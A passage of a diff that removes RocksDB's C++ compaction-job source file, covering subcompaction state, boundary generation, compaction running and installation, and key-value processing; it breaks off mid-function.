-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/compaction_job.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <algorithm>
-#include <functional>
-#include <list>
-#include <memory>
-#include <random>
-#include <set>
-#include <thread>
-#include <utility>
-#include <vector>
-
-#include "db/builder.h"
-#include "db/db_iter.h"
-#include "db/dbformat.h"
-#include "db/event_helpers.h"
-#include "db/log_reader.h"
-#include "db/log_writer.h"
-#include "db/memtable.h"
-#include "db/memtable_list.h"
-#include "db/merge_context.h"
-#include "db/merge_helper.h"
-#include "db/version_set.h"
-#include "monitoring/iostats_context_imp.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/thread_status_util.h"
-#include "port/likely.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table.h"
-#include "table/block.h"
-#include "table/block_based_table_factory.h"
-#include "table/merging_iterator.h"
-#include "table/table_builder.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/log_buffer.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-#include "util/sst_file_manager_impl.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-// Maintains state for each sub-compaction
-struct CompactionJob::SubcompactionState {
-  const Compaction* compaction;
-  std::unique_ptr<CompactionIterator> c_iter;
-
-  // The boundaries of the key-range this compaction is interested in. No two
-  // subcompactions may have overlapping key-ranges.
-  // 'start' is inclusive, 'end' is exclusive, and nullptr means unbounded
-  Slice *start, *end;
-
-  // The return status of this subcompaction
-  Status status;
-
-  // Files produced by this subcompaction
-  struct Output {
-    FileMetaData meta;
-    bool finished;
-    std::shared_ptr<const TableProperties> table_properties;
-  };
-
-  // State kept for output being generated
-  std::vector<Output> outputs;
-  std::unique_ptr<WritableFileWriter> outfile;
-  std::unique_ptr<TableBuilder> builder;
-  Output* current_output() {
-    if (outputs.empty()) {
-      // This subcompaction's outptut could be empty if compaction was aborted
-      // before this subcompaction had a chance to generate any output files.
-      // When subcompactions are executed sequentially this is more likely and
-      // will be particulalry likely for the later subcompactions to be empty.
-      // Once they are run in parallel however it should be much rarer.
-      return nullptr;
-    } else {
-      return &outputs.back();
-    }
-  }
-
-  uint64_t current_output_file_size;
-
-  // State during the subcompaction
-  uint64_t total_bytes;
-  uint64_t num_input_records;
-  uint64_t num_output_records;
-  CompactionJobStats compaction_job_stats;
-  uint64_t approx_size;
-  // An index that used to speed up ShouldStopBefore().
-  size_t grandparent_index = 0;
-  // The number of bytes overlapping between the current output and
-  // grandparent files used in ShouldStopBefore().
-  uint64_t overlapped_bytes = 0;
-  // A flag determine whether the key has been seen in ShouldStopBefore()
-  bool seen_key = false;
-  std::string compression_dict;
-
-  SubcompactionState(Compaction* c, Slice* _start, Slice* _end,
-                     uint64_t size = 0)
-      : compaction(c),
-        start(_start),
-        end(_end),
-        outfile(nullptr),
-        builder(nullptr),
-        current_output_file_size(0),
-        total_bytes(0),
-        num_input_records(0),
-        num_output_records(0),
-        approx_size(size),
-        grandparent_index(0),
-        overlapped_bytes(0),
-        seen_key(false),
-        compression_dict() {
-    assert(compaction != nullptr);
-  }
-
-  SubcompactionState(SubcompactionState&& o) { *this = std::move(o); }
-
-  SubcompactionState& operator=(SubcompactionState&& o) {
-    compaction = std::move(o.compaction);
-    start = std::move(o.start);
-    end = std::move(o.end);
-    status = std::move(o.status);
-    outputs = std::move(o.outputs);
-    outfile = std::move(o.outfile);
-    builder = std::move(o.builder);
-    current_output_file_size = std::move(o.current_output_file_size);
-    total_bytes = std::move(o.total_bytes);
-    num_input_records = std::move(o.num_input_records);
-    num_output_records = std::move(o.num_output_records);
-    compaction_job_stats = std::move(o.compaction_job_stats);
-    approx_size = std::move(o.approx_size);
-    grandparent_index = std::move(o.grandparent_index);
-    overlapped_bytes = std::move(o.overlapped_bytes);
-    seen_key = std::move(o.seen_key);
-    compression_dict = std::move(o.compression_dict);
-    return *this;
-  }
-
-  // Because member unique_ptrs do not have these.
-  SubcompactionState(const SubcompactionState&) = delete;
-
-  SubcompactionState& operator=(const SubcompactionState&) = delete;
-
-  // Returns true iff we should stop building the current output
-  // before processing "internal_key".
-  bool ShouldStopBefore(const Slice& internal_key, uint64_t curr_file_size) {
-    const InternalKeyComparator* icmp =
-        &compaction->column_family_data()->internal_comparator();
-    const std::vector<FileMetaData*>& grandparents = compaction->grandparents();
-
-    // Scan to find earliest grandparent file that contains key.
-    while (grandparent_index < grandparents.size() &&
-           icmp->Compare(internal_key,
-                         grandparents[grandparent_index]->largest.Encode()) >
-               0) {
-      if (seen_key) {
-        overlapped_bytes += grandparents[grandparent_index]->fd.GetFileSize();
-      }
-      assert(grandparent_index + 1 >= grandparents.size() ||
-             icmp->Compare(
-                 grandparents[grandparent_index]->largest.Encode(),
-                 grandparents[grandparent_index + 1]->smallest.Encode()) <= 0);
-      grandparent_index++;
-    }
-    seen_key = true;
-
-    if (overlapped_bytes + curr_file_size >
-        compaction->max_compaction_bytes()) {
-      // Too much overlap for current output; start new output
-      overlapped_bytes = 0;
-      return true;
-    }
-
-    return false;
-  }
-};
-
-// Maintains state for the entire compaction
-struct CompactionJob::CompactionState {
-  Compaction* const compaction;
-
-  // REQUIRED: subcompaction states are stored in order of increasing
-  // key-range
-  std::vector<CompactionJob::SubcompactionState> sub_compact_states;
-  Status status;
-
-  uint64_t total_bytes;
-  uint64_t num_input_records;
-  uint64_t num_output_records;
-
-  explicit CompactionState(Compaction* c)
-      : compaction(c),
-        total_bytes(0),
-        num_input_records(0),
-        num_output_records(0) {}
-
-  size_t NumOutputFiles() {
-    size_t total = 0;
-    for (auto& s : sub_compact_states) {
-      total += s.outputs.size();
-    }
-    return total;
-  }
-
-  Slice SmallestUserKey() {
-    for (const auto& sub_compact_state : sub_compact_states) {
-      if (!sub_compact_state.outputs.empty() &&
-          sub_compact_state.outputs[0].finished) {
-        return sub_compact_state.outputs[0].meta.smallest.user_key();
-      }
-    }
-    // If there is no finished output, return an empty slice.
-    return Slice(nullptr, 0);
-  }
-
-  Slice LargestUserKey() {
-    for (auto it = sub_compact_states.rbegin(); it < sub_compact_states.rend();
-         ++it) {
-      if (!it->outputs.empty() && it->current_output()->finished) {
-        assert(it->current_output() != nullptr);
-        return it->current_output()->meta.largest.user_key();
-      }
-    }
-    // If there is no finished output, return an empty slice.
-    return Slice(nullptr, 0);
-  }
-};
-
-void CompactionJob::AggregateStatistics() {
-  for (SubcompactionState& sc : compact_->sub_compact_states) {
-    compact_->total_bytes += sc.total_bytes;
-    compact_->num_input_records += sc.num_input_records;
-    compact_->num_output_records += sc.num_output_records;
-  }
-  if (compaction_job_stats_) {
-    for (SubcompactionState& sc : compact_->sub_compact_states) {
-      compaction_job_stats_->Add(sc.compaction_job_stats);
-    }
-  }
-}
-
-CompactionJob::CompactionJob(
-    int job_id, Compaction* compaction, const ImmutableDBOptions& db_options,
-    const EnvOptions& env_options, VersionSet* versions,
-    const std::atomic<bool>* shutting_down, LogBuffer* log_buffer,
-    Directory* db_directory, Directory* output_directory, Statistics* stats,
-    InstrumentedMutex* db_mutex, Status* db_bg_error,
-    std::vector<SequenceNumber> existing_snapshots,
-    SequenceNumber earliest_write_conflict_snapshot,
-    std::shared_ptr<Cache> table_cache, EventLogger* event_logger,
-    bool paranoid_file_checks, bool measure_io_stats, const std::string& dbname,
-    CompactionJobStats* compaction_job_stats)
-    : job_id_(job_id),
-      compact_(new CompactionState(compaction)),
-      compaction_job_stats_(compaction_job_stats),
-      compaction_stats_(1),
-      dbname_(dbname),
-      db_options_(db_options),
-      env_options_(env_options),
-      env_(db_options.env),
-      versions_(versions),
-      shutting_down_(shutting_down),
-      log_buffer_(log_buffer),
-      db_directory_(db_directory),
-      output_directory_(output_directory),
-      stats_(stats),
-      db_mutex_(db_mutex),
-      db_bg_error_(db_bg_error),
-      existing_snapshots_(std::move(existing_snapshots)),
-      earliest_write_conflict_snapshot_(earliest_write_conflict_snapshot),
-      table_cache_(std::move(table_cache)),
-      event_logger_(event_logger),
-      paranoid_file_checks_(paranoid_file_checks),
-      measure_io_stats_(measure_io_stats) {
-  assert(log_buffer_ != nullptr);
-  const auto* cfd = compact_->compaction->column_family_data();
-  ThreadStatusUtil::SetColumnFamily(cfd, cfd->ioptions()->env,
-                                    db_options_.enable_thread_tracking);
-  ThreadStatusUtil::SetThreadOperation(ThreadStatus::OP_COMPACTION);
-  ReportStartedCompaction(compaction);
-}
-
-CompactionJob::~CompactionJob() {
-  assert(compact_ == nullptr);
-  ThreadStatusUtil::ResetThreadStatus();
-}
-
-void CompactionJob::ReportStartedCompaction(
-    Compaction* compaction) {
-  const auto* cfd = compact_->compaction->column_family_data();
-  ThreadStatusUtil::SetColumnFamily(cfd, cfd->ioptions()->env,
-                                    db_options_.enable_thread_tracking);
-
-  ThreadStatusUtil::SetThreadOperationProperty(
-      ThreadStatus::COMPACTION_JOB_ID,
-      job_id_);
-
-  ThreadStatusUtil::SetThreadOperationProperty(
-      ThreadStatus::COMPACTION_INPUT_OUTPUT_LEVEL,
-      (static_cast<uint64_t>(compact_->compaction->start_level()) << 32) +
-          compact_->compaction->output_level());
-
-  // In the current design, a CompactionJob is always created
-  // for non-trivial compaction.
-  assert(compaction->IsTrivialMove() == false ||
-         compaction->is_manual_compaction() == true);
-
-  ThreadStatusUtil::SetThreadOperationProperty(
-      ThreadStatus::COMPACTION_PROP_FLAGS,
-      compaction->is_manual_compaction() +
-          (compaction->deletion_compaction() << 1));
-
-  ThreadStatusUtil::SetThreadOperationProperty(
-      ThreadStatus::COMPACTION_TOTAL_INPUT_BYTES,
-      compaction->CalculateTotalInputSize());
-
-  IOSTATS_RESET(bytes_written);
-  IOSTATS_RESET(bytes_read);
-  ThreadStatusUtil::SetThreadOperationProperty(
-      ThreadStatus::COMPACTION_BYTES_WRITTEN, 0);
-  ThreadStatusUtil::SetThreadOperationProperty(
-      ThreadStatus::COMPACTION_BYTES_READ, 0);
-
-  // Set the thread operation after operation properties
-  // to ensure GetThreadList() can always show them all together.
-  ThreadStatusUtil::SetThreadOperation(
-      ThreadStatus::OP_COMPACTION);
-
-  if (compaction_job_stats_) {
-    compaction_job_stats_->is_manual_compaction =
-        compaction->is_manual_compaction();
-  }
-}
-
-void CompactionJob::Prepare() {
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_COMPACTION_PREPARE);
-
-  // Generate file_levels_ for compaction berfore making Iterator
-  auto* c = compact_->compaction;
-  assert(c->column_family_data() != nullptr);
-  assert(c->column_family_data()->current()->storage_info()
-      ->NumLevelFiles(compact_->compaction->level()) > 0);
-
-  // Is this compaction producing files at the bottommost level?
-  bottommost_level_ = c->bottommost_level();
-
-  if (c->ShouldFormSubcompactions()) {
-    const uint64_t start_micros = env_->NowMicros();
-    GenSubcompactionBoundaries();
-    MeasureTime(stats_, SUBCOMPACTION_SETUP_TIME,
-                env_->NowMicros() - start_micros);
-
-    assert(sizes_.size() == boundaries_.size() + 1);
-
-    for (size_t i = 0; i <= boundaries_.size(); i++) {
-      Slice* start = i == 0 ? nullptr : &boundaries_[i - 1];
-      Slice* end = i == boundaries_.size() ? nullptr : &boundaries_[i];
-      compact_->sub_compact_states.emplace_back(c, start, end, sizes_[i]);
-    }
-    MeasureTime(stats_, NUM_SUBCOMPACTIONS_SCHEDULED,
-                compact_->sub_compact_states.size());
-  } else {
-    compact_->sub_compact_states.emplace_back(c, nullptr, nullptr);
-  }
-}
-
-struct RangeWithSize {
-  Range range;
-  uint64_t size;
-
-  RangeWithSize(const Slice& a, const Slice& b, uint64_t s = 0)
-      : range(a, b), size(s) {}
-};
-
-// Generates a histogram representing potential divisions of key ranges from
-// the input. It adds the starting and/or ending keys of certain input files
-// to the working set and then finds the approximate size of data in between
-// each consecutive pair of slices. Then it divides these ranges into
-// consecutive groups such that each group has a similar size.
-void CompactionJob::GenSubcompactionBoundaries() {
-  auto* c = compact_->compaction;
-  auto* cfd = c->column_family_data();
-  const Comparator* cfd_comparator = cfd->user_comparator();
-  std::vector<Slice> bounds;
-  int start_lvl = c->start_level();
-  int out_lvl = c->output_level();
-
-  // Add the starting and/or ending key of certain input files as a potential
-  // boundary
-  for (size_t lvl_idx = 0; lvl_idx < c->num_input_levels(); lvl_idx++) {
-    int lvl = c->level(lvl_idx);
-    if (lvl >= start_lvl && lvl <= out_lvl) {
-      const LevelFilesBrief* flevel = c->input_levels(lvl_idx);
-      size_t num_files = flevel->num_files;
-
-      if (num_files == 0) {
-        continue;
-      }
-
-      if (lvl == 0) {
-        // For level 0 add the starting and ending key of each file since the
-        // files may have greatly differing key ranges (not range-partitioned)
-        for (size_t i = 0; i < num_files; i++) {
-          bounds.emplace_back(flevel->files[i].smallest_key);
-          bounds.emplace_back(flevel->files[i].largest_key);
-        }
-      } else {
-        // For all other levels add the smallest/largest key in the level to
-        // encompass the range covered by that level
-        bounds.emplace_back(flevel->files[0].smallest_key);
-        bounds.emplace_back(flevel->files[num_files - 1].largest_key);
-        if (lvl == out_lvl) {
-          // For the last level include the starting keys of all files since
-          // the last level is the largest and probably has the widest key
-          // range. Since it's range partitioned, the ending key of one file
-          // and the starting key of the next are very close (or identical).
-          for (size_t i = 1; i < num_files; i++) {
-            bounds.emplace_back(flevel->files[i].smallest_key);
-          }
-        }
-      }
-    }
-  }
-
-  std::sort(bounds.begin(), bounds.end(),
-    [cfd_comparator] (const Slice& a, const Slice& b) -> bool {
-      return cfd_comparator->Compare(ExtractUserKey(a), ExtractUserKey(b)) < 0;
-    });
-  // Remove duplicated entries from bounds
-  bounds.erase(std::unique(bounds.begin(), bounds.end(),
-    [cfd_comparator] (const Slice& a, const Slice& b) -> bool {
-      return cfd_comparator->Compare(ExtractUserKey(a), ExtractUserKey(b)) == 0;
-    }), bounds.end());
-
-  // Combine consecutive pairs of boundaries into ranges with an approximate
-  // size of data covered by keys in that range
-  uint64_t sum = 0;
-  std::vector<RangeWithSize> ranges;
-  auto* v = cfd->current();
-  for (auto it = bounds.begin();;) {
-    const Slice a = *it;
-    it++;
-
-    if (it == bounds.end()) {
-      break;
-    }
-
-    const Slice b = *it;
-    uint64_t size = versions_->ApproximateSize(v, a, b, start_lvl, out_lvl + 1);
-    ranges.emplace_back(a, b, size);
-    sum += size;
-  }
-
-  // Group the ranges into subcompactions
-  const double min_file_fill_percent = 4.0 / 5;
-  uint64_t max_output_files = static_cast<uint64_t>(
-      std::ceil(sum / min_file_fill_percent /
-                c->mutable_cf_options()->MaxFileSizeForLevel(out_lvl)));
-  uint64_t subcompactions =
-      std::min({static_cast<uint64_t>(ranges.size()),
-                static_cast<uint64_t>(db_options_.max_subcompactions),
-                max_output_files});
-
-  if (subcompactions > 1) {
-    double mean = sum * 1.0 / subcompactions;
-    // Greedily add ranges to the subcompaction until the sum of the ranges'
-    // sizes becomes >= the expected mean size of a subcompaction
-    sum = 0;
-    for (size_t i = 0; i < ranges.size() - 1; i++) {
-      sum += ranges[i].size;
-      if (subcompactions == 1) {
-        // If there's only one left to schedule then it goes to the end so no
-        // need to put an end boundary
-        continue;
-      }
-      if (sum >= mean) {
-        boundaries_.emplace_back(ExtractUserKey(ranges[i].range.limit));
-        sizes_.emplace_back(sum);
-        subcompactions--;
-        sum = 0;
-      }
-    }
-    sizes_.emplace_back(sum + ranges.back().size);
-  } else {
-    // Only one range so its size is the total sum of sizes computed above
-    sizes_.emplace_back(sum);
-  }
-}
-
-Status CompactionJob::Run() {
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_COMPACTION_RUN);
-  TEST_SYNC_POINT("CompactionJob::Run():Start");
-  log_buffer_->FlushBufferToLog();
-  LogCompaction();
-
-  const size_t num_threads = compact_->sub_compact_states.size();
-  assert(num_threads > 0);
-  const uint64_t start_micros = env_->NowMicros();
-
-  // Launch a thread for each of subcompactions 1...num_threads-1
-  std::vector<port::Thread> thread_pool;
-  thread_pool.reserve(num_threads - 1);
-  for (size_t i = 1; i < compact_->sub_compact_states.size(); i++) {
-    thread_pool.emplace_back(&CompactionJob::ProcessKeyValueCompaction, this,
-                             &compact_->sub_compact_states[i]);
-  }
-
-  // Always schedule the first subcompaction (whether or not there are also
-  // others) in the current thread to be efficient with resources
-  ProcessKeyValueCompaction(&compact_->sub_compact_states[0]);
-
-  // Wait for all other threads (if there are any) to finish execution
-  for (auto& thread : thread_pool) {
-    thread.join();
-  }
-
-  if (output_directory_) {
-    output_directory_->Fsync();
-  }
-
-  compaction_stats_.micros = env_->NowMicros() - start_micros;
-  MeasureTime(stats_, COMPACTION_TIME, compaction_stats_.micros);
-
-  // Check if any thread encountered an error during execution
-  Status status;
-  for (const auto& state : compact_->sub_compact_states) {
-    if (!state.status.ok()) {
-      status = state.status;
-      break;
-    }
-  }
-
-  TablePropertiesCollection tp;
-  for (const auto& state : compact_->sub_compact_states) {
-    for (const auto& output : state.outputs) {
-      auto fn = TableFileName(db_options_.db_paths, output.meta.fd.GetNumber(),
-                              output.meta.fd.GetPathId());
-      tp[fn] = output.table_properties;
-    }
-  }
-  compact_->compaction->SetOutputTableProperties(std::move(tp));
-
-  // Finish up all book-keeping to unify the subcompaction results
-  AggregateStatistics();
-  UpdateCompactionStats();
-  RecordCompactionIOStats();
-  LogFlush(db_options_.info_log);
-  TEST_SYNC_POINT("CompactionJob::Run():End");
-
-  compact_->status = status;
-  return status;
-}
-
-Status CompactionJob::Install(const MutableCFOptions& mutable_cf_options) {
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_COMPACTION_INSTALL);
-  db_mutex_->AssertHeld();
-  Status status = compact_->status;
-  ColumnFamilyData* cfd = compact_->compaction->column_family_data();
-  cfd->internal_stats()->AddCompactionStats(
-      compact_->compaction->output_level(), compaction_stats_);
-
-  if (status.ok()) {
-    status = InstallCompactionResults(mutable_cf_options);
-  }
-  VersionStorageInfo::LevelSummaryStorage tmp;
-  auto vstorage = cfd->current()->storage_info();
-  const auto& stats = compaction_stats_;
-
-  double read_write_amp = 0.0;
-  double write_amp = 0.0;
-  double bytes_read_per_sec = 0;
-  double bytes_written_per_sec = 0;
-
-  if (stats.bytes_read_non_output_levels > 0) {
-    read_write_amp = (stats.bytes_written + stats.bytes_read_output_level +
-                      stats.bytes_read_non_output_levels) /
-                     static_cast<double>(stats.bytes_read_non_output_levels);
-    write_amp = stats.bytes_written /
-                static_cast<double>(stats.bytes_read_non_output_levels);
-  }
-  if (stats.micros > 0) {
-    bytes_read_per_sec =
-        (stats.bytes_read_non_output_levels + stats.bytes_read_output_level) /
-        static_cast<double>(stats.micros);
-    bytes_written_per_sec =
-        stats.bytes_written / static_cast<double>(stats.micros);
-  }
-
-  ROCKS_LOG_BUFFER(
-      log_buffer_,
-      "[%s] compacted to: %s, MB/sec: %.1f rd, %.1f wr, level %d, "
-      "files in(%d, %d) out(%d) "
-      "MB in(%.1f, %.1f) out(%.1f), read-write-amplify(%.1f) "
-      "write-amplify(%.1f) %s, records in: %d, records dropped: %d\n",
-      cfd->GetName().c_str(), vstorage->LevelSummary(&tmp), bytes_read_per_sec,
-      bytes_written_per_sec, compact_->compaction->output_level(),
-      stats.num_input_files_in_non_output_levels,
-      stats.num_input_files_in_output_level, stats.num_output_files,
-      stats.bytes_read_non_output_levels / 1048576.0,
-      stats.bytes_read_output_level / 1048576.0,
-      stats.bytes_written / 1048576.0, read_write_amp, write_amp,
-      status.ToString().c_str(), stats.num_input_records,
-      stats.num_dropped_records);
-
-  UpdateCompactionJobStats(stats);
-
-  auto stream = event_logger_->LogToBuffer(log_buffer_);
-  stream << "job" << job_id_
-         << "event" << "compaction_finished"
-         << "compaction_time_micros" << compaction_stats_.micros
-         << "output_level" << compact_->compaction->output_level()
-         << "num_output_files" << compact_->NumOutputFiles()
-         << "total_output_size" << compact_->total_bytes
-         << "num_input_records" << compact_->num_input_records
-         << "num_output_records" << compact_->num_output_records
-         << "num_subcompactions" << compact_->sub_compact_states.size();
-
-  if (compaction_job_stats_ != nullptr) {
-    stream << "num_single_delete_mismatches"
-           << compaction_job_stats_->num_single_del_mismatch;
-    stream << "num_single_delete_fallthrough"
-           << compaction_job_stats_->num_single_del_fallthru;
-  }
-
-  if (measure_io_stats_ && compaction_job_stats_ != nullptr) {
-    stream << "file_write_nanos" << compaction_job_stats_->file_write_nanos;
-    stream << "file_range_sync_nanos"
-           << compaction_job_stats_->file_range_sync_nanos;
-    stream << "file_fsync_nanos" << compaction_job_stats_->file_fsync_nanos;
-    stream << "file_prepare_write_nanos"
-           << compaction_job_stats_->file_prepare_write_nanos;
-  }
-
-  stream << "lsm_state";
-  stream.StartArray();
-  for (int level = 0; level < vstorage->num_levels(); ++level) {
-    stream << vstorage->NumLevelFiles(level);
-  }
-  stream.EndArray();
-
-  CleanupCompaction();
-  return status;
-}
-
-void CompactionJob::ProcessKeyValueCompaction(SubcompactionState* sub_compact) {
-  assert(sub_compact != nullptr);
-  ColumnFamilyData* cfd = sub_compact->compaction->column_family_data();
-  std::unique_ptr<RangeDelAggregator> range_del_agg(
-      new RangeDelAggregator(cfd->internal_comparator(), existing_snapshots_));
-  std::unique_ptr<InternalIterator> input(versions_->MakeInputIterator(
-      sub_compact->compaction, range_del_agg.get()));
-
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_COMPACTION_PROCESS_KV);
-
-  // I/O measurement variables
-  PerfLevel prev_perf_level = PerfLevel::kEnableTime;
-  const uint64_t kRecordStatsEvery = 1000;
-  uint64_t prev_write_nanos = 0;
-  uint64_t prev_fsync_nanos = 0;
-  uint64_t prev_range_sync_nanos = 0;
-  uint64_t prev_prepare_write_nanos = 0;
-  if (measure_io_stats_) {
-    prev_perf_level = GetPerfLevel();
-    SetPerfLevel(PerfLevel::kEnableTime);
-    prev_write_nanos = IOSTATS(write_nanos);
-    prev_fsync_nanos = IOSTATS(fsync_nanos);
-    prev_range_sync_nanos = IOSTATS(range_sync_nanos);
-    prev_prepare_write_nanos = IOSTATS(prepare_write_nanos);
-  }
-
-  const MutableCFOptions* mutable_cf_options =
-      sub_compact->compaction->mutable_cf_options();
-
-  // To build compression dictionary, we sample the first output file, assuming
-  // it'll reach the maximum length, and then use the dictionary for compressing
-  // subsequent output files. The dictionary may be less than max_dict_bytes if
-  // the first output file's length is less than the maximum.
-  const int kSampleLenShift = 6;  // 2^6 = 64-byte samples
-  std::set<size_t> sample_begin_offsets;
-  if (bottommost_level_ &&
-      cfd->ioptions()->compression_opts.max_dict_bytes > 0) {
-    const size_t kMaxSamples =
-        cfd->ioptions()->compression_opts.max_dict_bytes >> kSampleLenShift;
-    const size_t kOutFileLen = mutable_cf_options->MaxFileSizeForLevel(
-        compact_->compaction->output_level());
-    if (kOutFileLen != port::kMaxSizet) {
-      const size_t kOutFileNumSamples = kOutFileLen >> kSampleLenShift;
-      Random64 generator{versions_->NewFileNumber()};
-      for (size_t i = 0; i < kMaxSamples; ++i) {
-        sample_begin_offsets.insert(generator.Uniform(kOutFileNumSamples)
-                                    << kSampleLenShift);
-      }
-    }
-  }
-
-  auto compaction_filter = cfd->ioptions()->compaction_filter;
-  std::unique_ptr<CompactionFilter> compaction_filter_from_factory = nullptr;
-  if (compaction_filter == nullptr) {
-    compaction_filter_from_factory =
-        sub_compact->compaction->CreateCompactionFilter();
-    compaction_filter = compaction_filter_from_factory.get();
-  }
-  MergeHelper merge(
-      env_, cfd->user_comparator(), cfd->ioptions()->merge_operator,
-      compaction_filter, db_options_.info_log.get(),
-      false /* internal key corruption is expected */,
-      existing_snapshots_.empty() ? 0 : existing_snapshots_.back(),
-      compact_->compaction->level(), db_options_.statistics.get(),
-      shutting_down_);
-
-  TEST_SYNC_POINT("CompactionJob::Run():Inprogress");
-
-  Slice* start = sub_compact->start;
-  Slice* end = sub_compact->end;
-  if (start != nullptr) {
-    IterKey start_iter;
-    start_iter.SetInternalKey(*start, kMaxSequenceNumber, kValueTypeForSeek);
-    input->Seek(start_iter.GetInternalKey());
-  } else {
-    input->SeekToFirst();
-  }
-
-  // we allow only 1 compaction event listener. Used by blob storage
-  CompactionEventListener* comp_event_listener = nullptr;
-#ifndef ROCKSDB_LITE
-  for (auto& celitr : cfd->ioptions()->listeners) {
-    comp_event_listener = celitr->GetCompactionEventListener();
-    if (comp_event_listener != nullptr) {
-      break;
-    }
-  }
-#endif  // ROCKSDB_LITE
-
-  Status status;
-  sub_compact->c_iter.reset(new CompactionIterator(
-      input.get(), cfd->user_comparator(), &merge, versions_->LastSequence(),
-      &existing_snapshots_, earliest_write_conflict_snapshot_, env_, false,
-      range_del_agg.get(), sub_compact->compaction, compaction_filter,
-      comp_event_listener, shutting_down_));
-  auto c_iter = sub_compact->c_iter.get();
-  c_iter->SeekToFirst();
-  if (c_iter->Valid() &&
-      sub_compact->compaction->output_level() != 0) {
-    // ShouldStopBefore() maintains state based on keys processed so far. The
-    // compaction loop always calls it on the "next" key, thus won't tell it the
-    // first key. So we do that here.
-    sub_compact->ShouldStopBefore(
-      c_iter->key(), sub_compact->current_output_file_size);
-  }
-  const auto& c_iter_stats = c_iter->iter_stats();
-  auto sample_begin_offset_iter = sample_begin_offsets.cbegin();
-  // data_begin_offset and compression_dict are only valid while generating
-  // dictionary from the first output file.
-  size_t data_begin_offset = 0;
-  std::string compression_dict;
-  compression_dict.reserve(cfd->ioptions()->compression_opts.max_dict_bytes);
-
-  while (status.ok() && !cfd->IsDropped() && c_iter->Valid()) {
-    // Invariant: c_iter.status() is guaranteed to be OK if c_iter->Valid()
-    // returns true.
-    const Slice& key = c_iter->key();
-    const Slice& value = c_iter->value();
-
-    // If an end key (exclusive) is specified, check if the current key is
-    // >= than it and exit if it is because the iterator is out of its range
-    if (end != nullptr &&
-        cfd->user_comparator()->Compare(c_iter->user_key(), *end) >= 0) {
-      break;
-    }
-    if (c_iter_stats.num_input_records % kRecordStatsEvery ==
-        kRecordStatsEvery - 1) {
-      RecordDroppedKeys(c_iter_stats, &sub_compact->compaction_job_stats);
-      c_iter->ResetRecordCounts();
-      RecordCompactionIOStats();
-    }
-
-    // Open output file if necessary
-    if (sub_compact->builder == nullptr) {
-      status = OpenCompactionOutputFile(sub_compact);
-      if (!status.ok()) {
-        break;
-      }
-    }
-    assert(sub_compact->builder != nullptr);
-    assert(sub_compact->current_output() != nullptr);
-    sub_compact->builder->Add(key, value);
-    sub_compact->current_output_file_size = sub_compact->builder->FileSize();
-    sub_compact->current_output()->meta.UpdateBoundaries(
-        key, c_iter->ikey().sequence);
-    sub_compact->num_output_records++;
-
-    if (sub_compact->outputs.size() == 1) {  // first output file
-      // Check if this key/value overlaps any sample intervals; if so, appends
-      // overlapping portions to the dictionary.
-      for (const auto& data_elmt : {key, value}) {
-        size_t data_end_offset = data_begin_offset + data_elmt.size();
-        while (sample_begin_offset_iter != sample_begin_offsets.cend() &&
-               *sample_begin_offset_iter < data_end_offset) {
-          size_t sample_end_offset =
-              *sample_begin_offset_iter + (1 << kSampleLenShift);
-          // Invariant: Because we advance sample iterator while processing the
-          // data_elmt containing the sample's last byte, the current sample
-          // cannot end before the current data_elmt.
-          assert(data_begin_offset < sample_end_offset);
-
-          size_t data_elmt_copy_offset, data_elmt_copy_len;
-          if (*sample_begin_offset_iter <= data_begin_offset) {
-            // The sample starts before data_elmt starts, so take bytes starting
-            // at the beginning of data_elmt.
-            data_elmt_copy_offset = 0;
-          } else {
-            // data_elmt starts before the sample starts, so take bytes starting
-            // at the below offset into data_elmt.
-            data_elmt_copy_offset =
-                *sample_begin_offset_iter - data_begin_offset;
-          }
-          if (sample_end_offset <= data_end_offset) {
-            // The sample ends before data_elmt ends, so take as many bytes as
-            // needed.
-            data_elmt_copy_len =
-                sample_end_offset - (data_begin_offset + data_elmt_copy_offset);
-          } else {
-            // data_elmt ends before the sample ends, so take all remaining
-            // bytes in data_elmt.
-            data_elmt_copy_len =
-                data_end_offset - (data_begin_offset + data_elmt_copy_offset);
-          }
-          compression_dict.append(&data_elmt.data()[data_elmt_copy_offset],
-                                  data_elmt_copy_len);
-          if (sample_end_offset > data_end_offset) {
-            // Didn't finish sample. Try to finish it with the next data_elmt.
-            break;
-          }
-          // Next sample may require bytes from same data_elmt.
-          sample_begin_offset_iter++;
-        }
-        data_begin_offset = data_end_offset;
-      }
-    }
-
-    // Close output file if it is big enough. Two possibilities determine it's
-    // time to close it: (1) the current key should be this file's last key, (2)
-    // the next key should not be in this file.
-    //
-    // TODO(aekmekji): determine if file should be closed earlier than this
-    // during subcompactions (i.e. if output size, estimated by input size, is
-    // going to be 1.2MB and max_output_file_size = 1MB, prefer to have 0.6MB
-    // and 0.6MB instead of 1MB and 0.2MB)
-    bool output_file_ended = false;
-    Status input_status;
-    if (sub_compact->compaction->output_level() != 0 &&
-        sub_compact->current_output_file_size >=
-            sub_compact->compaction->max_output_file_size()) {
-      // (1) this key terminates the file. For historical reasons, the iterator
-      // status before advancing will be given to FinishCompactionOutputFile().
-      input_status = input->status();
-      output_file_ended = true;
-    }
-    c_iter->Next();
-    if (!output_file_ended && c_iter->Valid() &&
-        sub_compact->compaction->output_level() != 0 &&
-        sub_compact->ShouldStopBefore(
-          c_iter->key(), sub_compact->current_output_file_size) &&
-        sub_compact->builder != nullptr) {
-      // (2) this key belongs to the next file. For historical reasons, the
-      // iterator status after advancing will be given to
-      // FinishCompactionOutputFile().
